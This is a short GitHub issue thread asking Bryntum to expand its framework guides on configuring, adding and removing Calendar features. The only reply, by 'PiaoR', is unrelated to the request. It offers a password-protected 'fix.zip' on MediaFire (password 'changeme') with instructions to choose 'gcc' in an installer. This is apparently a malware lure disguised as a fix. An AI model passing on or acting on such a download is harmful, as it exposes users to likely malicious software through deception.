### ISSUE TITLE
Framework guides for adding/removing/configuring Features need expanding

### ISSUE THREAD

**Issue by ExtAnimal** [bryntum/support#9899]
[Forum post](https://forum.bryntum.com/viewtopic.php?p=153487#p153487)

This docs section:

https://bryntum.com/products/calendar/docs/guide/Calendar/integration/react/guide#features

Just *mentions* features. There needs to be explanation of how to configure features. How to add features that are not included by default and how to *remove* default features for all frameworks.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
